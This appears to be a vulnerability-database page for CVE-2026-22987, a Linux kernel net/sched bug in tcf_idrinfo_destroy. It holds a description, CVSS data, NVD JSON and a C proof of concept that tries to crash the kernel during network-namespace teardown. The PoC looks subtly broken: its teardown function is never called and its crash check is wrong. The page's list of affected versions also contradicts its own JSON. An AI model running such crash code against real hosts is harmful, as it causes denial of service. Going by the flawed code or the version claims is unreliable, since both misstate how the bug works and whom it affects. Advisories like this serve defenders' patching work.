Security Vulnerability Report
CVE-2026-22987 CVSS 5.5 MEDIUM

CVE-2026-22987

Published: 2026-01-23 16:15:55
Last Modified: 2026-02-26 18:49:04
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

net/sched: act_api: avoid dereferencing ERR_PTR in tcf_idrinfo_destroy

syzbot reported a crash in tc_act_in_hw() during netns teardown where tcf_idrinfo_destroy() passed an ERR_PTR(-EBUSY) value as a tc_action pointer, leading to an invalid dereference.

Guard against ERR_PTR entries when iterating the action IDR so teardown does not call tc_act_in_hw() on an error pointer.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.19:rc4:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 5.10 (affected net/sched/act_api.c)
Linux Kernel < 5.15 (affected net/sched/act_api.c)
Linux Kernel < 6.1 (affected net/sched/act_api.c)
Linux Kernel < 6.6 (affected net/sched/act_api.c)
All distributions with vulnerable kernel versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// CVE-2026-22987 PoC - Linux Kernel net/sched act_api NULL Pointer Dereference
// This PoC demonstrates triggering the vulnerability through netns teardown
// Note: Requires kernel debugging symbols and proper environment setup
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sched.h>
#include <net/if.h>
#include <linux/if_tun.h>
#include <fcntl.h>

#define MAX_TC_ACTIONS 100

int create_netns() {
    int netns_fd;
    char netns_name[64];

    // Create unique network namespace
    snprintf(netns_name, sizeof(netns_name), "cve_2026_22987_%d", getpid());

    // Create network namespace using unshare
    if (unshare(CLONE_NEWNET) != 0) {
        perror("unshare(CLONE_NEWNET) failed");
        return -1;
    }
    return 0;
}

int setup_tc_actions() {
    // Setup traffic control actions that may leave ERR_PTR entries
    // This simulates the condition where tcf_idrinfo_destroy encounters
    // ERR_PTR(-EBUSY) values during netns teardown
    char cmd[256];

    // Create qdisc first
    system("tc qdisc add dev lo root handle 1: prio 2>/dev/null");

    // Add multiple actions that may fail and leave error pointers
    for (int i = 0; i < MAX_TC_ACTIONS; i++) {
        snprintf(cmd, sizeof(cmd), "tc actions add action drop index %d 2>/dev/null", i);
        system(cmd);
    }
    return 0;
}

int trigger_teardown() {
    // Trigger netns teardown which calls tcf_idrinfo_destroy
    // This is where the vulnerability is triggered
    // Exit the network namespace to trigger cleanup
    // The kernel will call tcf_idrinfo_destroy during netns exit
    // Remount to default namespace
    system("ip netns delete $(ip netns list | grep cve_2026_22987 | awk '{print $1}') 2>/dev/null");
    return 0;
}

int main(int argc, char *argv[]) {
    printf("[*] CVE-2026-22987 PoC - Linux Kernel act_api NULL Pointer Dereference\n");
    printf("[*] Target: Linux Kernel net/sched/act_api.c tcf_idrinfo_destroy()\n");
    printf("[*] CVSS: 5.5 (Medium) - AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\n\n");

    pid_t pid = fork();
    if (pid < 0) {
        perror("fork failed");
        return 1;
    }

    if (pid == 0) {
        // Child process - create network namespace and trigger vulnerability
        if (create_netns() < 0) {
            exit(1);
        }
        setup_tc_actions();
        printf("[+] Network namespace created with TC actions\n");
        printf("[*] Exiting namespace to trigger netns teardown...\n");
        // Exit to trigger tcf_idrinfo_destroy
        exit(0);
    } else {
        // Parent process - wait for child and observe crash
        int status;
        waitpid(pid, &status, 0);
        if (WIFSIGNALED(status)) {
            printf("[!] Kernel crash detected (signal %d)\n", WTERMSIG(status));
            printf("[+] Vulnerability confirmed!\n");
        } else if (WEXITSTATUS(status) == 0) {
            printf("[*] Process exited normally (may need root privileges)\n");
        } else {
            printf("[*] Process exited with status: %d\n", WEXITSTATUS(status));
        }
    }

    printf("\n[*] PoC execution completed\n");
    return 0;
}

// Compilation: gcc -o cve_2026_22987_poc cve_2026_22987_poc.c
// Execution: Requires root privileges to create network namespaces
// Note: Actual exploitation requires specific kernel configuration and version

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22987", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-23T16:15:54.757", "lastModified": "2026-02-26T18:49:04.210", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: act_api: avoid dereferencing ERR_PTR in tcf_idrinfo_destroy\n\nsyzbot reported a crash in tc_act_in_hw() during netns teardown where\ntcf_idrinfo_destroy() passed an ERR_PTR(-EBUSY) value as a tc_action\npointer, leading to an invalid dereference.\n\nGuard against ERR_PTR entries when iterating the action IDR so teardown\ndoes not call tc_act_in_hw() on an error pointer."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nnet/sched: act_api: evitar la desreferenciación de ERR_PTR en tcf_idrinfo_destroy\n\nsyzbot informó de un fallo en tc_act_in_hw() durante el desmontaje de netns donde tcf_idrinfo_destroy() pasó un valor ERR_PTR(-EBUSY) como un puntero tc_action, lo que llevó a una desreferenciación inválida.\n\nProtegerse contra entradas ERR_PTR al iterar el IDR de acción para que el desmontaje no llame a tc_act_in_hw() en un puntero de error."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": 
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.17", "versionEndExcluding": "6.18.6", "matchCriteriaId": "F535E896-F773-4ED1-84E6-317F81D02785"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:*", "matchCriteriaId": "17B67AA7-40D6-4AFA-8459-F200F3D7CFD1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:*", "matchCriteriaId": "C47E4CC9-C826-4FA9-B014-7FE3D9B318B2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:*", "matchCriteriaId": "F71D92C0-C023-48BD-B3B6-70B638EEE298"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc4:*:*:*:*:*:*", "matchCriteriaId": "13580667-0A98-40CC-B29F-D12790B91BDB"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/67550a1130b647bb0d093c9c0a810c69aa6a30a8", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/adb25a46dc0a43173f5ea5f5f58fc8ba28970c7c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}